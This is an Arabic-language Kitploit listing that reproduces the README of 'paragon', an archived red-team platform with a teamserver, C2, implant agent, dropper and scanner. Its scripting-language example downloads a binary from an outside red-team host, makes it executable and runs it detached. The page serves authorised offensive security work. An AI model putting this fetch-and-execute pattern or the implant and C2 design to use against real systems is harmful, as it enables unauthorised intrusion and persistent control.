Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
paragon — منصة مشاركة الفريق الأحمر تهدف إلى توحيد الأدوات الهجومية خلف واجهة مستخدم بسيطة. | Kitploit
أدوات/GitHubGitHub/kcarretto/paragon
أطر اختبار الاختراقأطر الاستغلالالبرمجة النصية والأتمتةما بعد الاستغلالالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubkcarretto/paragon

paragon

منصة مشاركة الفريق الأحمر تهدف إلى توحيد الأدوات الهجومية خلف واجهة مستخدم بسيطة.

عرض المستودع
3044219منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إشعار إيقاف التطوير

تم إيقاف هذا المشروع، يُرجى الرجوع إلى مشروعنا الجديد Realm project، الذي يبني على العديد من الأفكار التي كانت لدينا عند بناء هذا المستودع.

CI Build Status Go Report Card Coverage Status GitHub release GoDoc

باراغون

Demo

باراغون هي منصة للمشاركة في فريق الاختراق (Red Team). تهدف إلى توحيد الأدوات الهجومية خلف واجهة مستخدم بسيطة، وتجريد الكثير من العمل الخلفي لتمكين المشغلين من التركيز على كتابة البذور (implants) وقضاء وقت أقل في القلق بشأن قواعد البيانات و CSS. كما يوفر المستودع بعض الأدوات الهجومية المدمجة بالفعل مع باراغون ويمكن استخدامها أثناء المشاركات.

هذا المستودع لا يزال قيد التطوير المكثف وليس جاهزًا للاستخدام الإنتاجي. عندما يعتبر مستقرًا، سيتم إصدار علامة V1.0.0. حتى ذلك الحين، قد تواجه واجهة البرمجة تغييرات مكسرة مع قيامنا بتبسيط تصميمنا باستمرار. يُرجى قراءة وثائق المطور أدناه إذا كنت ترغب في مساعدتنا في الوصول إلى هذا الإنجاز بشكل أسرع.

جدول المحتويات

  • أبرز الميزات
  • بدء الاستخدام
  • نظرة عامة على المكونات
  • الأسئلة الشائعة
  • المصطلحات
  • دليل المطور

أبرز الميزات

  • دمج الأدوات المخصصة بسهولة لتوحيد العمليات خلف واجهة واحدة
  • الاستعلام عن رسم المعرفة (knowledge graph) لفريق الاختراق باستخدام واجهة GraphQL API المقدمة
  • إصدار الأحداث (Event emission) للأتمتة منخفضة الكمون والمعالجة في الوقت الفعلي
  • لغة برمجة شبيهة بـ Python للنشر والاستغلال اللاحق (post-exploitation) والمزيد
  • بذور (implants) ونشر عبر المنصات (cross-platform) مضمنة
  • تسجيل نشاط المشغل لتجميعه بسهولة في تقرير بعد المشاركة للمراجعة

بدء الاستخدام

يمكن إعداد نموذج توضيحي سريع عن طريق استنساخ المستودع وتشغيل docker-compose up. افتح 127.0.0.1:80 في متصفحك للبدء!

الصور المستخدمة متاحة على docker-hub ويمكن تكوينها من ملف docker-compose للنشر الإنتاجي.

نظرة عامة على المكونات

لغة البرمجة النصية

تعتمد معظم المكونات في هذا المستودع على لغة برمجة نصية شبيهة بـ Python تتيح تحكمًا قويًا وتخصيصًا لسلوكها. اللغة هي نسخة معدلة من Google's starlark، مع إضافة وظائف عبر المنصات للمشغلين. يتيح هذا أيضًا لأدوات مثل الوكيل (agent) والمُسقط (dropper) (الموضحان أدناه) تنفيذ المهام دون الاعتماد على البرامج النظامية الثنائية (curl, bash, إلخ). يتم تنفيذ جميع العمليات ككود في Go، لذا من البديهي إضافة وظائف إضافية إلى بيئة البرمجة النصية. إليك مثال على سكريبت:

# تنزيل ملف عبر https، تنفيذه، وعدم الإبقاء عليه كعملية تابعة.
load("sys", "request")

new_bin = "/tmp/kqwncWECaaV"
request("https://library.redteam.tld", writeToFile=new_bin)

# تعيين صلاحيات new_bin إلى 0755
chmod(new_bin, ownerRead=True, ownerWrite=True, ownerExec=True, groupRead=True, groupExec=True, worldRead=True, worldExec=True)
exec(new_bin, disown=True)

مرجع

خادم الفريق (Teamserver)

يوفر تطبيق ويب بسيط وواجهة GraphQL API للتفاعل مع رسم المعرفة (knowledge graph) لفريق الاختراق، مما يوحد الأدوات خلف مصدر حقيقة مركزي ويجرد العديد من الاهتمامات الخلفية المملة من المشغلين. قم بدمج أدواتك المخصصة مع خادم الفريق (باستخدام GraphQL API أو اشتراكات الأحداث) لتوفير الوقت في العمل الخلفي. يسجل خادم الفريق جميع الأنشطة، لذا مع توحيد جميع أدواتك في مكان واحد، يصبح كتابة تقارير ما بعد المشاركة أسهل بكثير.

الأدوات المضمنة

الأدوات التالية مضمنة أيضًا في المستودع. يمكن توسيعها بسهولة لتناسب العديد من حالات الاستخدام عبر المنصات.

المُسقط (Dropper)

  • متعدد المنصات بالكامل (fully cross-platform)
  • تجميع الأصول (assets) بشكل ثابت (statically compile) في برنامج ثنائي واحد
  • يوفر لغة برمجة نصية شبيهة بـ Python لتكوين النشر المخصص

يوفر باراغون أداة لتجميع الأصول (برامج ثنائية، سكريبتات، إلخ) في برنامج ثنائي واحد عند تنفيذه سيتم تشغيل سكريبت النشر المخصص الذي قد يكتب الأصول إلى نظام الملفات، تشغيل العمليات، تنزيل الملفات، معالجة الأخطاء، والمزيد. إنه متعدد المنصات بالكامل ومجمع بشكل ثابت، مما يوفر نشرًا موثوقًا. إذا كنت ترغب في توسيع وظائفه، يمكنك ببساطة توسيع ملف Go الذي تم إنشاؤه قبل التجميع.

الوكيل (Agent)

  • متعدد المنصات بالكامل
  • يوفر لغة برمجة نصية شبيهة بـ Python للاستغلال اللاحق (post exploitation)
  • آليات اتصال معيارية، قم بتجميع ما تحتاجه فقط
    • استخدم خيارات متعددة لضمان عمليات الاسترجاع (callbacks) الموثوقة
  • تخصيص كيفية تعامل الوكيل مع حالات فشل الاتصال

بذرة (implant) تنفذ المهام وتقدم نتائج التنفيذ. تم تكوينه افتراضيًا لتنفيذ المهام باستخدام لغة البرمجة النصية الشبيهة بـ Python الخاصة بباراغون والتواصل مع C2 عبر http(s). هو مكتوب بلغة Go ويمكن تعديله بسرعة لإضافة طرق نقل جديدة (مثل DNS) وخيارات تنفيذ ومنطق تجاوز الفشل والمزيد.

C2

  • نشر خفيف الوزن
  • أداء عالٍ، قادر على التعامل مع آلاف الوكلاء
    • يعتمد على موارد النظام وعرض النطاق الترددي المتاح
  • خدمة موزعة، استخدم عددًا من C2s حسب رغبتك

يعمل كوسيط بين الوكيل وخادم الفريق. يتعامل مع استرجاعات الوكيل (agent callbacks) لمجموعة متنوعة من آليات الاتصال ويزوده بمهام جديدة من قائمة انتظار خادم الفريق.

المُشغّل (Runner)

  • تنفيذ المهام بكمون منخفض وفي الوقت الفعلي
  • يمكن توسيعه بسهولة لإضافة دعم لآليات اتصال أكثر
  • خدمة موزعة، استخدم عددًا من المشغلين حسب رغبتك

بدلاً من انتظار استرجاع (callback)، قد تتطلب بعض المواقف اتصالًا أماميًا (forward connection) لتنفيذ مهمة بسرعة وعرض مخرجاتها. يحقق المُشغّل ذلك عن طريق الاشتراك في قوائم انتظار المهام وإنشاء اتصال بالجهاز الهدف (على سبيل المثال باستخدام ssh). يتيح هذا عمليات التكامل الشبيهة بالصدفة (shell-like) لاستخدام نفس الواجهة مثل البذور (implants) و C2s. كما يسمح بنشر البذور الأولية من خلال هذه الواجهة.

الماسح الضوئي (Scanner)

  • مراقبة الخدمات المستهدفة القابلة للوصول
  • أتمتة الاستجابات عندما تصبح الخدمات (غير) متاحة
  • توفير معلومات الشبكة لرسم المعرفة (knowledge graph)، والتي قد تستخدمها أدوات أخرى
  • خدمة موزعة، استخدم عددًا من الماسحات حسب رغبتك

مراقبة نشاط الشبكة الهدف والخدمات المرئية. رسم مخطط بياني لشبكة المشاركة، وتشغيل الأتمتة عند تغيرات الحالة (مثل توفر ssh).

الأسئلة الشائعة

ماذا لو أبلغت الأجهزة عن نفس UUID؟

تعيين متغير البيئة PG_KS_MachineUUID killswitch لخادم الفريق سيعطل عمليات البحث التي تستخدم UUIDs للأجهزة.

المصطلحات

لضمان التواصل الواضح حول هذه الأنظمة المعقدة، قمنا بتوضيح بعض المصطلحات الخاصة بالمشروع أدناه والتي سيتم استخدامها في جميع أنحاء وثائق المشروع.

البذرة (Implant)

أي برنامج ضار سيتم تشغيله على الأنظمة المخترقة أثناء المشاركة.

المهمة (Task)

العمليات المطلوب تنفيذها على نظام مخترق معين. توفر المهام تعليمات التنفيذ للبذور (implants)، ومع ذلك يمكن أن يكون بناء الجملة / الهيكل محددًا تمامًا لأداة معينة.

الوكيل (Agent)

بذرة (Implant) تتلقى المهام من خادم الفريق، وتنفذها، وتقدم نتائجها. يتم تضمين تطبيق افتراضي قابل للتوسيع مع هذا المستودع، والذي يتطلب تقديم المهام كسكريبتات مكتوبة باستخدام لغة DSL الشبيهة بـ Python الخاصة بالمشروع.

الوظيفة (Job)

طلبات من خادم الفريق لتنفيذ مجموعة من العمليات المحددة. عند إنشاء وظيفة، سيتم حفظ التعليمات ولكن لن يتم تنفيذها. يمكن للمستخدم طلب من خادم الفريق تنفيذ وظيفة صفر أو أكثر من المرات عن طريق وضع الوظيفة في قائمة الانتظار وتوفير المعلمات المطلوبة لها. لا يمكن أبدًا تحديث الوظائف، ولكن يمكن إنشاء إصدارات جديدة من الوظائف لتجنب النسخ واللصق المفرط.

تنزيل الأداة